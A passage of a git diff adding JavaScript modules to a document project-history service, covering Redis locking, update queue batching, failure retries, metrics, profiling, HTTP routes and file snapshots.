lockValue, + redis_result: result, + }) + return callback(error) + } + return callback(err, result) + }) +} + +export function releaseLock(...args) { + _mocks.releaseLock(...args) +} + +export function runWithLock(key, runner, callback) { + if (callback == null) { + callback = function () {} + } + return getLock(key, function (error, lockValue) { + if (error != null) { + return callback(OError.tag(error)) + } + + const lock = new Lock(key, lockValue) + return runner(lock.extend.bind(lock), (error1, ...args) => + lock.release(function (error2) { + error = error1 || error2 + if (error != null) { + return callback(OError.tag(error), ...Array.from(args)) + } + return callback(null, ...Array.from(args)) + }) + ) + }) +} + +export function healthCheck(callback) { + const action = (extendLock, releaseLock) => releaseLock() + return runWithLock( + `HistoryLock:HealthCheck:host=${HOST}:pid=${PID}:random=${RND}`, + action, + callback + ) +} + +export function close(callback) { + rclient.quit() + return rclient.once('end', callback) +} + +class Lock { + constructor(key, value) { + this.key = key + this.value = value + this.slowExecutionError = new OError('slow execution during lock') + this.lockTakenAt = Date.now() + this.timer = new metrics.Timer('lock.project') + } + + extend(callback) { + const lockLength = Date.now() - this.lockTakenAt + if (lockLength < MIN_LOCK_EXTENSION_INTERVAL) { + return async.setImmediate(callback) + } + return extendLock(this.key, this.value, error => { + if (error != null) { + return callback(OError.tag(error)) + } + this.lockTakenAt = Date.now() + return callback() + }) + } + + release(callback) { + // The lock can expire in redis but the process carry on. This setTimout call + // is designed to log if this happens. + const lockLength = Date.now() - this.lockTakenAt + if (lockLength > LOCK_TTL * 1000) { + metrics.inc('lock.project.exceeded_lock_timeout') + logger.debug('exceeded lock timeout', { + key: this.key, + slowExecutionError: this.slowExecutionError, + }) + } + + return releaseLock(this.key, this.value, error => { + this.timer.done() + if (error != null) { + return callback(OError.tag(error)) + } + return callback() + }) + } +} + +/** + * Promisified version of runWithLock. + * + * @param {string} key + * @param {(extendLock: Function) => Promise<any>} runner + */ +async function runWithLockPromises(key, runner) { + const runnerCb = (extendLock, callback) => { + const extendLockPromises = promisify(extendLock) + runner(extendLockPromises) + .then(result => { + callback(null, result) + }) + .catch(err => { + callback(err) + }) + } + + return await new Promise((resolve, reject) => { + runWithLock(key, runnerCb, (err, result) => { + if (err) { + reject(err) + } else { + resolve(result) + } + }) + }) +} + +export const promises = { + tryLock: promisify(tryLock), + extendLock: promisify(extendLock), + getLock: promisify(getLock), + checkLock: promisify(checkLock), + releaseLock: promisify(releaseLock), + runWithLock: runWithLockPromises, +} diff --git a/services/project-history/app/js/Metrics.js b/services/project-history/app/js/Metrics.js new file mode 100644 index 0000000..b515189 --- /dev/null +++ b/services/project-history/app/js/Metrics.js @@ -0,0 +1,15 @@ +// @ts-check + +import { prom } from '@overleaf/metrics' + +export const historyFlushDurationSeconds = new prom.Histogram({ + name: 'history_flush_duration_seconds', + help: 'Duration of a history flush in seconds', + buckets: [0.05, 0.1, 0.2, 0.3, 0.5, 1, 2, 5, 10], +}) + +export const historyFlushQueueSize = new prom.Histogram({ + name: 'history_flush_queue_size', + help: 'Size of the queue during history flushes', + buckets: prom.exponentialBuckets(1, 2, 10), +}) diff --git a/services/project-history/app/js/OperationsCompressor.js b/services/project-history/app/js/OperationsCompressor.js new file mode 100644 index 0000000..d14a4c8 --- /dev/null +++ b/services/project-history/app/js/OperationsCompressor.js @@ -0,0 +1,20 @@ +export function compressOperations(operations) { + if (!operations.length) return [] + + const newOperations = [] + let currentOperation = operations[0] + for (let operationId = 1; operationId < operations.length; operationId++) { + const nextOperation = operations[operationId] + if (currentOperation.canBeComposedWith(nextOperation)) { + currentOperation = currentOperation.compose(nextOperation) + } else { + // currentOperation and nextOperation cannot be composed. Push the + // currentOperation and start over with nextOperation. + newOperations.push(currentOperation) + currentOperation = nextOperation + } + } + newOperations.push(currentOperation) + + return newOperations +} diff --git a/services/project-history/app/js/Profiler.js b/services/project-history/app/js/Profiler.js new file mode 100644 index 0000000..9b10552 --- /dev/null +++ b/services/project-history/app/js/Profiler.js @@ -0,0 +1,80 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' + +const LOG_CUTOFF_TIME = 1000 + +const deltaMs = function (ta, tb) { + const nanoSeconds = (ta[0] - tb[0]) * 1e9 + (ta[1] - tb[1]) + const milliSeconds = Math.floor(nanoSeconds * 1e-6) + return milliSeconds +} + +export class Profiler { + constructor(name, args) { + this.name = name + this.args = args + this.t0 = this.t = process.hrtime() + this.start = new Date() + this.updateTimes = [] + } + + log(label) { + const t1 = process.hrtime() + const dtMilliSec = deltaMs(t1, this.t) + this.t = t1 + this.updateTimes.push([label, dtMilliSec]) // timings in ms + return this // make it chainable + } + + end(message) { + const totalTime = deltaMs(this.t, this.t0) + // record the update times in metrics + for (const update of Array.from(this.updateTimes)) { + metrics.timing(`profile.${this.name}.${update[0]}`, update[1]) + } + if (totalTime > LOG_CUTOFF_TIME) { + // log anything greater than cutoff + const args = {} + for (const k in this.args) { + const v = this.args[k] + args[k] = v + } + args.updateTimes = this.updateTimes + args.start = this.start + args.end = new Date() + logger.debug(args, this.name) + } + return totalTime + } + + getTimeDelta() { + const lastIdx = this.updateTimes.length - 1 + if (lastIdx >= 0) { + return this.updateTimes[lastIdx][1] + } else { + return 0 + } + } + + wrap(label, fn) { + // create a wrapped function which calls profile.log(label) before continuing execution + const newFn = (...args) => { + this.log(label) + return fn(...Array.from(args || [])) + } + return newFn + } +} diff --git a/services/project-history/app/js/RedisManager.js b/services/project-history/app/js/RedisManager.js new file mode 100644 index 0000000..2f79a10 --- /dev/null +++ b/services/project-history/app/js/RedisManager.js @@ -0,0 +1,445 @@ +import { callbackify, promisify } from 'node:util' +import { setTimeout } from 'node:timers/promises' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import metrics from '@overleaf/metrics' +import OError from '@overleaf/o-error' + +/** + * Maximum size taken from the redis queue, to prevent project history + * consuming unbounded amounts of memory + */ +export const RAW_UPDATE_SIZE_THRESHOLD = 4 * 1024 * 1024 + +/** + * Batch size when reading updates from Redis + */ +export const RAW_UPDATES_BATCH_SIZE = 50 + +/** + * Maximum length of ops (insertion and deletions) to process in a single + * iteration + */ +export const MAX_UPDATE_OP_LENGTH = 1024 + +/** + * Warn if we exceed this raw update size, the final compressed updates we + * send could be smaller than this + */ +const WARN_RAW_UPDATE_SIZE = 1024 * 1024 + +/** + * Maximum number of new docs to process in a single iteration + */ +export const MAX_NEW_DOC_CONTENT_COUNT = 32 + +const CACHE_TTL_IN_SECONDS = 3600 + +const Keys = Settings.redis.project_history.key_schema +const rclient = redis.createClient(Settings.redis.project_history) + +async function countUnprocessedUpdates(projectId) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + const updates = await rclient.llen(key) + return updates +} + +async function* getRawUpdates(projectId) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + let start = 0 + while (true) { + const stop = start + RAW_UPDATES_BATCH_SIZE - 1 + const updates = await rclient.lrange(key, start, stop) + for (const update of updates) { + yield update + } + if (updates.length < RAW_UPDATES_BATCH_SIZE) { + return + } + start += RAW_UPDATES_BATCH_SIZE + } +} + +async function getRawUpdatesBatch(projectId, batchSize) { + const rawUpdates = [] + let totalRawUpdatesSize = 0 + let hasMore = false + for await (const rawUpdate of getRawUpdates(projectId)) { + totalRawUpdatesSize += rawUpdate.length + if ( + rawUpdates.length > 0 && + totalRawUpdatesSize > RAW_UPDATE_SIZE_THRESHOLD + ) { + hasMore = true + break + } + rawUpdates.push(rawUpdate) + if (rawUpdates.length >= batchSize) { + hasMore = true + break + } + } + metrics.timing('redis.incoming.bytes', totalRawUpdatesSize, 1) + if (totalRawUpdatesSize > WARN_RAW_UPDATE_SIZE) { + const rawUpdateSizes = rawUpdates.map(rawUpdate => rawUpdate.length) + logger.warn( + { + projectId, + totalRawUpdatesSize, + rawUpdateSizes, + }, + 'large raw update size' + ) + } + return { rawUpdates, hasMore } +} + +export function parseDocUpdates(jsonUpdates) { + return jsonUpdates.map(update => JSON.parse(update)) +} + +async function getUpdatesInBatches(projectId, batchSize, runner) { + let moreBatches = true + while (moreBatches) { + const redisBatch = await getRawUpdatesBatch(projectId, batchSize) + if (redisBatch.rawUpdates.length === 0) { + break + } + moreBatches = redisBatch.hasMore + + const rawUpdates = [] + const updates = [] + let totalOpLength = 0 + let totalDocContentCount = 0 + for (const rawUpdate of redisBatch.rawUpdates) { + let update + try { + update = JSON.parse(rawUpdate) + } catch (error) { + throw OError.tag(error, 'failed to parse update', { + projectId, + update, + }) + } + + totalOpLength += update?.op?.length || 1 + if (update.resyncDocContent) { + totalDocContentCount += 1 + } + + if ( + updates.length > 0 && + (totalOpLength > MAX_UPDATE_OP_LENGTH || + totalDocContentCount > MAX_NEW_DOC_CONTENT_COUNT) + ) { + moreBatches = true + break + } + if (update.resyncProjectStructureOnly) { + update._raw = rawUpdate + } + + rawUpdates.push(rawUpdate) + updates.push(update) + } + + await runner(updates) + await deleteAppliedDocUpdates(projectId, rawUpdates) + + if (batchSize === 1) { + // Special case for single stepping, don't process more batches + break + } + } +} + +/** + * @param {string} projectId + * @param {ResyncProjectStructureUpdate} update + * @return {Promise<void>} + */ +async function deleteAppliedDocUpdate(projectId, update) { + const raw = update._raw + // Delete the first occurrence of the update with LREM KEY COUNT + // VALUE by setting COUNT to 1 which 'removes COUNT elements equal to + // value moving from head to tail.' + // + // If COUNT is 0 the entire list would be searched which would block + // redis since it would be an O(N) operation where N is the length of + // the queue, in a multi of the batch size. + metrics.summary('redis.projectHistoryOps', raw.length, { + status: 'lrem', + }) + await rclient.lrem(Keys.projectHistoryOps({ project_id: projectId }), 1, raw) +} + +async function deleteAppliedDocUpdates(projectId, updates) { + const multi = rclient.multi() + // Delete all the updates which have been applied (exact match) + for (const update of updates) { + // Delete the first occurrence of the update with LREM KEY COUNT + // VALUE by setting COUNT to 1 which 'removes COUNT elements equal to + // value moving from head to tail.' + // + // If COUNT is 0 the entire list would be searched which would block + // redis since it would be an O(N) operation where N is the length of + // the queue, in a multi of the batch size. + metrics.summary('redis.projectHistoryOps', update.length, { + status: 'lrem', + }) + multi.lrem(Keys.projectHistoryOps({ project_id: projectId }), 1, update) + } + if (updates.length > 0) { + multi.del(Keys.projectHistoryFirstOpTimestamp({ project_id: projectId })) + } + await multi.exec() +} + +/** + * Deletes the entire queue - use with caution + */ +async function destroyDocUpdatesQueue(projectId) { + await rclient.del( + Keys.projectHistoryOps({ project_id: projectId }), + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + ) +} + +/** + * Iterate over keys asynchronously using redis scan (non-blocking) + * + * handle all the cluster nodes or single redis server + */ +async function _getKeys(pattern, limit) { + const nodes = rclient.nodes?.('master') || [rclient] + const keysByNode = [] + for (const node of nodes) { + const keys = await _getKeysFromNode(node, pattern, limit) + keysByNode.push(keys) + } + return [].concat(...keysByNode) +} + +async function _getKeysFromNode(node, pattern, limit) { + let cursor = 0 // redis iterator + const keySet = new Set() // avoid duplicate results + const batchSize = limit != null ? Math.min(limit, 1000) : 1000 + + // scan over all keys looking for pattern + while (true) { + const reply = await node.scan(cursor, 'MATCH', pattern, 'COUNT', batchSize) + const [newCursor, keys] = reply + cursor = newCursor + + for (const key of keys) { + keySet.add(key) + } + + const noResults = cursor === '0' // redis returns string results not numeric + const limitReached = limit != null && keySet.size >= limit + if (noResults || limitReached) { + return Array.from(keySet) + } + + // avoid hitting redis too hard + await setTimeout(10) + } +} + +/** + * Extract ids from keys like DocsWithHistoryOps:57fd0b1f53a8396d22b2c24b + * or DocsWithHistoryOps:{57fd0b1f53a8396d22b2c24b} (for redis cluster) + */ +function _extractIds(keyList) { + return keyList.map(key => { + const m = key.match(/:\{?([0-9a-f]{24})\}?/) // extract object id + return m[1] + }) +} + +async function getProjectIdsWithHistoryOps(limit) { + const projectKeys = await _getKeys( + Keys.projectHistoryOps({ project_id: '*' }), + limit + ) + const projectIds = _extractIds(projectKeys) + return projectIds +} + +async function getProjectIdsWithHistoryOpsCount() { + const projectIds = await getProjectIdsWithHistoryOps() + const queuedProjectsCount = projectIds.length + metrics.globalGauge('queued-projects', queuedProjectsCount) + return queuedProjectsCount +} + +async function setFirstOpTimestamp(projectId) { + const key = Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + // store current time as an integer (string) + await rclient.setnx(key, Date.now()) +} + +async function getFirstOpTimestamp(projectId) { + const key = Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + const result = await rclient.get(key) + + // convert stored time back to a numeric timestamp + const timestamp = parseInt(result, 10) + + // check for invalid timestamp + if (isNaN(timestamp)) { + return null + } + + // convert numeric timestamp to a date object + const firstOpTimestamp = new Date(timestamp) + + return firstOpTimestamp +} + +async function getFirstOpTimestamps(projectIds) { + const keys = projectIds.map(projectId => + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + ) + const results = await rclient.mget(keys) + const timestamps = results.map(result => { + // convert stored time back to a numeric timestamp + const timestamp = parseInt(result, 10) + + // check for invalid timestamp + if (isNaN(timestamp)) { + return null + } + + // convert numeric timestamp to a date object + return new Date(timestamp) + }) + return timestamps +} + +async function clearFirstOpTimestamp(projectId) { + const key = Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + await rclient.del(key) +} + +async function getProjectIdsWithFirstOpTimestamps(limit) { + const projectKeys = await _getKeys( + Keys.projectHistoryFirstOpTimestamp({ project_id: '*' }), + limit + ) + const projectIds = _extractIds(projectKeys) + return projectIds +} + +async function clearDanglingFirstOpTimestamp(projectId) { + const count = await rclient.exists( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + Keys.projectHistoryOps({ project_id: projectId }) + ) + if (count === 2 || count === 0) { + // both (or neither) keys are present, so don't delete the timestamp + return 0 + } + // only one key is present, which makes this a dangling record, + // so delete the timestamp + const cleared = await rclient.del( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }) + ) + return cleared +} + +async function getCachedHistoryId(projectId) { + const key = Keys.projectHistoryCachedHistoryId({ project_id: projectId }) + const historyId = await rclient.get(key) + return historyId +} + +async function setCachedHistoryId(projectId, historyId) { + const key = Keys.projectHistoryCachedHistoryId({ project_id: projectId }) + await rclient.setex(key, CACHE_TTL_IN_SECONDS, historyId) +} + +async function clearCachedHistoryId(projectId) { + const key = Keys.projectHistoryCachedHistoryId({ project_id: projectId }) + await rclient.del(key) +} + +// EXPORTS + +const countUnprocessedUpdatesCb = callbackify(countUnprocessedUpdates) +const getRawUpdatesBatchCb = callbackify(getRawUpdatesBatch) +const deleteAppliedDocUpdatesCb = callbackify(deleteAppliedDocUpdates) +const destroyDocUpdatesQueueCb = callbackify(destroyDocUpdatesQueue) +const getProjectIdsWithHistoryOpsCb = callbackify(getProjectIdsWithHistoryOps) +const getProjectIdsWithHistoryOpsCountCb = callbackify( + getProjectIdsWithHistoryOpsCount +) +const setFirstOpTimestampCb = callbackify(setFirstOpTimestamp) +const getFirstOpTimestampCb = callbackify(getFirstOpTimestamp) +const getFirstOpTimestampsCb = callbackify(getFirstOpTimestamps) +const clearFirstOpTimestampCb = callbackify(clearFirstOpTimestamp) +const getProjectIdsWithFirstOpTimestampsCb = callbackify( + getProjectIdsWithFirstOpTimestamps +) +const clearDanglingFirstOpTimestampCb = callbackify( + clearDanglingFirstOpTimestamp +) +const getCachedHistoryIdCb = callbackify(getCachedHistoryId) +const setCachedHistoryIdCb = callbackify(setCachedHistoryId) +const clearCachedHistoryIdCb = callbackify(clearCachedHistoryId) + +const getUpdatesInBatchesCb = function ( + projectId, + batchSize, + runner, + callback +) { + const runnerPromises = promisify(runner) + getUpdatesInBatches(projectId, batchSize, runnerPromises) + .then(result => { + callback(null, result) + }) + .catch(err => { + callback(err) + }) +} + +export { + countUnprocessedUpdatesCb as countUnprocessedUpdates, + getRawUpdatesBatchCb as getRawUpdatesBatch, + deleteAppliedDocUpdatesCb as deleteAppliedDocUpdates, + destroyDocUpdatesQueueCb as destroyDocUpdatesQueue, + getUpdatesInBatchesCb as getUpdatesInBatches, + getProjectIdsWithHistoryOpsCb as getProjectIdsWithHistoryOps, + getProjectIdsWithHistoryOpsCountCb as getProjectIdsWithHistoryOpsCount, + setFirstOpTimestampCb as setFirstOpTimestamp, + getFirstOpTimestampCb as getFirstOpTimestamp, + getFirstOpTimestampsCb as getFirstOpTimestamps, + clearFirstOpTimestampCb as clearFirstOpTimestamp, + getProjectIdsWithFirstOpTimestampsCb as getProjectIdsWithFirstOpTimestamps, + clearDanglingFirstOpTimestampCb as clearDanglingFirstOpTimestamp, + getCachedHistoryIdCb as getCachedHistoryId, + setCachedHistoryIdCb as setCachedHistoryId, + clearCachedHistoryIdCb as clearCachedHistoryId, +} + +export const promises = { + countUnprocessedUpdates, + getRawUpdatesBatch, + deleteAppliedDocUpdates, + deleteAppliedDocUpdate, + destroyDocUpdatesQueue, + getUpdatesInBatches, + getProjectIdsWithHistoryOps, + getProjectIdsWithHistoryOpsCount, + setFirstOpTimestamp, + getFirstOpTimestamp, + getFirstOpTimestamps, + clearFirstOpTimestamp, + getProjectIdsWithFirstOpTimestamps, + clearDanglingFirstOpTimestamp, + getCachedHistoryId, + setCachedHistoryId, + clearCachedHistoryId, +} diff --git a/services/project-history/app/js/RetryManager.js b/services/project-history/app/js/RetryManager.js new file mode 100644 index 0000000..b146da2 --- /dev/null +++ b/services/project-history/app/js/RetryManager.js @@ -0,0 +1,194 @@ +import _ from 'lodash' +import { promisify, callbackify } from 'node:util' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as SyncManager from './SyncManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as RedisManager from './RedisManager.js' +import * as ErrorRecorder from './ErrorRecorder.js' + +const sleep = promisify(setTimeout) + +const TEMPORARY_FAILURES = [ + 'Error: ENOSPC: no space left on device, write', + 'Error: ESOCKETTIMEDOUT', + 'Error: failed to extend lock', + 'Error: tried to release timed out lock', + 'Error: Timeout', +] + +const HARD_FAILURES = [ + 'Error: history store a non-success status code: 422', + 'OError: history store a non-success status code: 422', + 'OpsOutOfOrderError: project structure version out of order', + 'OpsOutOfOrderError: project structure version out of order on incoming updates', + 'OpsOutOfOrderError: doc version out of order', + 'OpsOutOfOrderError: doc version out of order on incoming updates', +] + +const MAX_RESYNC_ATTEMPTS = 2 +const MAX_SOFT_RESYNC_ATTEMPTS = 1 + +export const promises = {} + +promises.retryFailures = async (options = {}) => { + const { failureType, timeout, limit } = options + if (failureType === 'soft') { + const batch = await getFailureBatch(softErrorSelector, limit) + const result = await retryFailureBatch(batch, timeout, async failure => { + await UpdatesProcessor.promises.processUpdatesForProject( + failure.project_id + ) + }) + return result + } else if (failureType === 'hard') { + const batch = await getFailureBatch(hardErrorSelector, limit) + const result = await retryFailureBatch(batch, timeout, async failure => { + await resyncProject(failure.project_id, { + hard: failureRequiresHardResync(failure), + }) + }) + return result + } +} + +export const retryFailures = callbackify(promises.retryFailures) + +function softErrorSelector(failure) { + return ( + (isTemporaryFailure(failure) && !isRepeatedFailure(failure)) || + (isFirstFailure(failure) && !isHardFailure(failure)) + ) +} + +function hardErrorSelector(failure) { + return ( + (isHardFailure(failure) || isRepeatedFailure(failure)) && + !isStuckFailure(failure) + ) +} + +function isTemporaryFailure(failure) { + return TEMPORARY_FAILURES.includes(failure.error) +} + +export function isHardFailure(failure) { + return HARD_FAILURES.includes(failure.error) +} + +export function isFirstFailure(failure) { + return failure.attempts <= 1 +} + +function isRepeatedFailure(failure) { + return failure.attempts > 3 +} + +function isStuckFailure(failure) { + return ( + failure.resyncAttempts != null && + failure.resyncAttempts >= MAX_RESYNC_ATTEMPTS + ) +} + +function failureRequiresHardResync(failure) { + return ( + failure.resyncAttempts != null && + failure.resyncAttempts >= MAX_SOFT_RESYNC_ATTEMPTS + ) +} + +async function getFailureBatch(selector, limit) { + let failures = await ErrorRecorder.promises.getFailedProjects() + failures = failures.filter(selector) + // randomise order + failures = _.shuffle(failures) + + // put a limit on the number to retry + const projectsToRetryCount = failures.length + if (limit && projectsToRetryCount > limit) { + failures = failures.slice(0, limit) + } + logger.debug({ projectsToRetryCount, limit }, 'retrying failed projects') + return failures +} + +async function retryFailureBatch(failures, timeout, retryHandler) { + const startTime = new Date() + + // keep track of successes and failures + const failed = [] + const succeeded = [] + for (const failure of failures) { + const projectId = failure.project_id + const timeTaken = new Date() - startTime + if (timeout && timeTaken > timeout) { + // finish early due to timeout + logger.debug('background retries timed out') + break + } + logger.debug( + { projectId, timeTaken }, + 'retrying failed project in background' + ) + try { + await retryHandler(failure) + succeeded.push(projectId) + } catch (err) { + failed.push(projectId) + } + } + return { succeeded, failed } +} + +async function resyncProject(projectId, options = {}) { + const { hard = false } = options + try { + if (!/^[0-9a-f]{24}$/.test(projectId)) { + logger.debug({ projectId }, 'clearing bad project id') + await ErrorRecorder.promises.clearError(projectId) + return + } + + await checkProjectHasHistoryId(projectId) + if (hard) { + await SyncManager.promises.startHardResync(projectId) + } else { + await SyncManager.promises.startResync(projectId) + } + await waitUntilRedisQueueIsEmpty(projectId) + await checkFailureRecordWasRemoved(projectId) + } catch (err) { + throw new OError({ + message: 'failed to resync project', + info: { projectId, hard }, + }).withCause(err) + } +} + +async function checkProjectHasHistoryId(projectId) { + const historyId = await WebApiManager.promises.getHistoryId(projectId) + if (historyId == null) { + throw new OError('no history id') + } +} + +async function waitUntilRedisQueueIsEmpty(projectId) { + for (let attempts = 0; attempts < 30; attempts++) { + const updatesCount = + await RedisManager.promises.countUnprocessedUpdates(projectId) + if (updatesCount === 0) { + return + } + await sleep(1000) + } + throw new OError('queue not empty') +} + +async function checkFailureRecordWasRemoved(projectId) { + const failureRecord = await ErrorRecorder.promises.getFailureRecord(projectId) + if (failureRecord) { + throw new OError('failure record still exists') + } +} diff --git a/services/project-history/app/js/Router.js b/services/project-history/app/js/Router.js new file mode 100644 index 0000000..ec9a4f0 --- /dev/null +++ b/services/project-history/app/js/Router.js @@ -0,0 +1,250 @@ +import OError from '@overleaf/o-error' +import * as HttpController from './HttpController.js' +import { Joi, validate } from './Validation.js' + +export function initialize(app) { + app.use( + validate({ + params: Joi.object({ + project_id: Joi.string().regex(/^[0-9a-f]{24}$/), + user_id: Joi.string().regex(/^[0-9a-f]{24}$/), + label_id: Joi.string().regex(/^[0-9a-f]{24}$/), + version: Joi.number().integer(), + }), + }) + ) + + // use an extended timeout on all endpoints, to allow for long requests to history-v1 + app.use(longerTimeout) + + app.post('/project', HttpController.initializeProject) + + app.delete('/project/:project_id', HttpController.deleteProject) + + app.get('/project/:project_id/snapshot', HttpController.getLatestSnapshot) + + app.get( + '/project/:project_id/diff', + validate({ + query: { + pathname: Joi.string().required(), + from: Joi.number().integer().required(), + to: Joi.number().integer().required(), + }, + }), + HttpController.getDiff + ) + + app.get( + '/project/:project_id/filetree/diff', + validate({ + query: { + from: Joi.number().integer().required(), + to: Joi.number().integer().required(), + }, + }), + HttpController.getFileTreeDiff + ) + + app.get( + '/project/:project_id/updates', + validate({ + query: { + before: Joi.number().integer(), + min_count: Joi.number().integer(), + }, + }), + HttpController.getUpdates + ) + + app.get( + '/project/:project_id/changes-in-chunk', + validate({ + query: { + since: Joi.number().integer().min(0), + }, + }), + HttpController.getChangesInChunkSince + ) + + app.get('/project/:project_id/version', HttpController.latestVersion) + + app.post( + '/project/:project_id/flush', + validate({ + query: { + debug: Joi.boolean().default(false), + bisect: Joi.boolean().default(false), + }, + }), + HttpController.flushProject + ) + + app.post( + '/project/:project_id/resync', + validate({ + query: { + force: Joi.boolean().default(false), + }, + body: { + force: Joi.boolean().default(false), + origin: Joi.object({ + kind: Joi.string().required(), + }), + historyRangesMigration: Joi.string() + .optional() + .valid('forwards', 'backwards'), + }, + }), + HttpController.resyncProject + ) + + app.get( + '/project/:project_id/dump', + validate({ + query: { + count: Joi.number().integer(), + }, + }), + HttpController.dumpProject + ) + + app.get('/project/:project_id/labels', HttpController.getLabels) + + app.post( + '/project/:project_id/labels', + validate({ + body: { + version: Joi.number().integer().required(), + comment: Joi.string().required(), + created_at: Joi.string(), + validate_exists: Joi.boolean().default(true), + user_id: Joi.string().allow(null), + }, + }), + + HttpController.createLabel + ) + + app.delete( + '/project/:project_id/user/:user_id/labels/:label_id', + validate({ + params: Joi.object({ + project_id: Joi.string().regex(/^[0-9a-f]{24}$/), + user_id: Joi.string().regex(/^[0-9a-f]{24}$/), + label_id: Joi.string().regex(/^[0-9a-f]{24}$/), + }), + }), + HttpController.deleteLabelForUser + ) + + app.delete( + '/project/:project_id/labels/:label_id', + validate({ + params: Joi.object({ + project_id: Joi.string().regex(/^[0-9a-f]{24}$/), + label_id: Joi.string().regex(/^[0-9a-f]{24}$/), + }), + }), + HttpController.deleteLabel + ) + + app.post( + '/user/:from_user/labels/transfer/:to_user', + HttpController.transferLabels + ) + + app.get( + '/project/:project_id/version/:version/:pathname', + HttpController.getFileSnapshot + ) + + app.get( + '/project/:project_id/ranges/version/:version/:pathname', + HttpController.getRangesSnapshot + ) + + app.get( + '/project/:project_id/metadata/version/:version/:pathname', + HttpController.getFileMetadataSnapshot + ) + + app.get( + '/project/:project_id/version/:version', + HttpController.getProjectSnapshot + ) + + app.get( + '/project/:project_id/paths/version/:version', + HttpController.getPathsAtVersion + ) + + app.post( + '/project/:project_id/force', + validate({ + query: { + clear: Joi.boolean().default(false), + }, + }), + HttpController.forceDebugProject + ) + + app.get('/project/:history_id/blob/:hash', HttpController.getProjectBlob) + + app.get('/status/failures', HttpController.getFailures) + + app.get('/status/queue', HttpController.getQueueCounts) + + app.post( + '/retry/failures', + validate({ + query: { + failureType: Joi.string().valid('soft', 'hard'), + // bail out after this time limit + timeout: Joi.number().integer().default(300), + // maximum number of projects to check + limit: Joi.number().integer().default(100), + callbackUrl: Joi.string(), + }, + }), + HttpController.retryFailures + ) + + app.post( + '/flush/old', + validate({ + query: { + // flush projects with queued ops older than this + maxAge: Joi.number() + .integer() + .default(6 * 3600), + // pause this amount of time between checking queues + queueDelay: Joi.number().integer().default(100), + // maximum number of queues to check + limit: Joi.number().integer().default(1000), + // maximum amount of time allowed + timeout: Joi.number() + .integer() + .default(60 * 1000), + // whether to run in the background + background: Joi.boolean().falsy('0').truthy('1').default(false), + }, + }), + HttpController.flushOld + ) + + app.get('/status', (req, res, next) => res.send('project-history is up')) + + app.get('/oops', function (req, res, next) { + throw new OError('dummy test error') + }) + + app.get('/check_lock', HttpController.checkLock) + + app.get('/health_check', HttpController.healthCheck) +} + +function longerTimeout(req, res, next) { + res.setTimeout(6 * 60 * 1000) + next() +} diff --git a/services/project-history/app/js/SnapshotManager.js b/services/project-history/app/js/SnapshotManager.js new file mode 100644 index 0000000..ed31674 --- /dev/null +++ b/services/project-history/app/js/SnapshotManager.js @@ -0,0 +1,426 @@ +// @ts-check + +import { callbackify } from 'node:util' +import Core from 'overleaf-editor-core' +import { Readable as StringStream } from 'node:stream' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as Errors from './Errors.js' +import _ from 'lodash' + +/** + * @import { Snapshot } from 'overleaf-editor-core' + * @import { RangesSnapshot } from './types' + */ + +StringStream.prototype._read = function () {} + +const MAX_REQUESTS = 4 // maximum number of parallel requests to v1 history service + +/** + * + * @param {string} projectId + * @param {number} version + * @param {string} pathname + */ +async function getFileSnapshotStream(projectId, version, pathname) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + + const file = snapshot.getFile(pathname) + if (file == null) { + throw new Errors.NotFoundError(`${pathname} not found`, { + projectId, + version, + pathname, + }) + } + + const historyId = await WebApiManager.promises.getHistoryId(projectId) + if (file.isEditable()) { + await file.load('eager', HistoryStoreManager.getBlobStore(historyId)) + const stream = new StringStream() + stream.push(file.getContent({ filterTrackedDeletes: true })) + stream.push(null) + return stream + } else { + return await HistoryStoreManager.promises.getProjectBlobStream( + historyId, + file.getHash() + ) + } +} + +/** + * Constructs a snapshot of the ranges in a document-updater compatible format. + * Positions will be relative to a document where tracked deletes have been + * removed from the string. This also means that if a tracked delete overlaps + * a comment range, the comment range will be truncated. + * + * @param {string} projectId + * @param {number} version + * @param {string} pathname + * @returns {Promise<RangesSnapshot>} + */ +async function getRangesSnapshot(projectId, version, pathname) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + const file = snapshot.getFile(pathname) + if (!file) { + throw new Errors.NotFoundError(`${pathname} not found`, { + projectId, + version, + pathname, + }) + } + if (!file.isEditable()) { + // A binary file has no tracked changes or comments + return { + changes: [], + comments: [], + } + } + const historyId = await WebApiManager.promises.getHistoryId(projectId) + await file.load('eager', HistoryStoreManager.getBlobStore(historyId)) + const content = file.getContent() + if (content == null) { + throw new Error('Unable to read file contents') + } + const trackedChanges = file.getTrackedChanges().asSorted() + const comments = file.getComments().toArray() + const docUpdaterCompatibleTrackedChanges = [] + + let trackedDeletionOffset = 0 + for (const trackedChange of trackedChanges) { + const isTrackedDeletion = trackedChange.tracking.type === 'delete' + const trackedChangeContent = content.slice( + trackedChange.range.start, + trackedChange.range.end + ) + const tcContent = isTrackedDeletion + ? { d: trackedChangeContent } + : { i: trackedChangeContent } + docUpdaterCompatibleTrackedChanges.push({ + op: { + p: trackedChange.range.start - trackedDeletionOffset, + ...tcContent, + }, + metadata: { + ts: trackedChange.tracking.ts.toISOString(), + user_id: trackedChange.tracking.userId, + }, + }) 